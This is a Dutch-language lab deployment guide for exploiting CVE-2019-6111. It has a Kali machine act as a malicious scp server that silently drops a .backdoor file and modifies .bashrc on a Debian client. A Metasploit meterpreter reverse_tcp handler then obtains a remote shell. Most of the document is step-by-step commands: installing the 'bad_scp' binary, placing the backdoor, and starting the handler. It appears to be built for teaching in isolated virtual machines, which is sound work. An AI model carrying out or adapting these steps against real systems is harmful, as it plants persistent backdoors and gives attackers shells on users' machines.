# User Deployment Guide - CVE-2019-6111

Deze handleiding beschrijft alle vereiste stappen om de CVE-2019-6111-exploit uit te voeren en een reverse shell op de Debian-client tot stand te brengen.

### Inhoudsopgave

- 1. Vereisten
- 2. Instellen Omgeving
  - 1. Debian (Jessie) Machine
  - 2. Kali Linux (Rolling) Machine
- 3. CVE-2019-6111
- 4. Metasploit

## Vereisten

- VirtualBox
- Bash of PowerShell
- Git
- Debian (Jessie) vdi
- Kali Linux (Rolling) vdi

# Instellen Omgeving

Om de exploit uit te voeren, moeten we eerst de omgeving configureren. Hiervoor hebben we twee virtuele machines nodig: een Debian (Jessie) machine en een Kali Linux (Rolling) machine. De Debian-machine zal het doelwit zijn van onze aanval, terwijl we de Kali Linux-machine gebruiken om de aanval uit te voeren.

#### Debian (Jessie) Machine

Om deze virtuele machine te installeren, hebben we een script geschreven dat de installatie automatisch uitvoert. Het script is te vinden in de map src/debian van deze repository.

```
$ bash unattended_install.sh
```

of

```
PS1> .\unattended_install.ps1
```

#### Kali Linux (Rolling) Machine

Om deze virtuele machine te installeren, hebben we een script geschreven dat de installatie automatisch uitvoert. Het script is te vinden in de map src/kali van deze repository.

```
$ bash unattended_install.sh
```

of

```
PS1> .\unattended_install.ps1
```

Deze exploit vereist dat de Debian-client een bestand van een "bad" scp-server downloadt. In dit geval is de Kali-virtuele machine de "bad" scp-server. Om van onze Kali-machine een "bad" scp-server te maken,

moeten we een aangepaste scp-binary installeren. Deze binary bevindt zich in de map src/kali/provision/golang/bin van deze repository.

**Opmerking**: Voer dit commando uit als root.

```
# git clone https://github.com/AntonVanAssche/CSV-NPE2223.git
# cp -r CSV-NPE2223/src/kali/provision/golang/bin/bad_scp /usr/bin/scp
```

Daarna moeten we de backdoor in de /tmp-map plaatsen. Deze backdoor is te vinden in de map src/kali/provision/backdoor van deze repository.

**Opmerking**: Voer dit commando uit als root.

```
# cp -r CSV-NPE2223/src/kali/provision/backdoor /tmp/backdoor
```

Deze backdoor is gekoppeld aan het IP-adres 192.168.0.121, dus we moeten het IP-adres van de Kalimachine aanpassen met behulp van het ip.sh-script in de map src/kali/provision/.

```
$ bash ip.sh
```

Als laatste stap moeten we de ssh-server starten.

**Opmerking**: Voer dit commando uit als root.

```
# systemctl start ssh
```

## CVE-2019-6111

Het uitvoeren van de exploit is vrij eenvoudig. We moeten simpelweg een bestand downloaden van de "bad" scp-server. Dit bestand kan elk willekeurig bestand zijn. In dit voorbeeld gebruiken we het bestand testfile.txt.

```
$ scp 192.168.0.121:testfile.txt .
```

Na uitvoering van het commando zal het bestand testfile.txt worden gedownload. Als je echter het commando ls -a uitvoert, zul je merken dat er ook een bestand genaamd .backdoor is gedownload en dat het .bashrc-bestand is gewijzigd.

# Metasploit

Nadat de backdoor op de Debian-client is geïnstalleerd, kunnen we een reverse shell opzetten met behulp van het Metasploit-framework.

**Opmerking**: Voer dit commando uit als root.

```
# msfconsole -q -x "handler -p linux/aarch64/meterpreter/reverse_tcp -P 4444 -H
192.168.0.121"
```

Zodra de gebruiker een nieuwe Bash-shell opent, wordt dit gedetecteerd door Metasploit.

```
msf6 > sessions 1
```

Om een reverse shell op te zetten, voeren we eenvoudigweg het volgende commando uit:

```
meterpreter > shell
```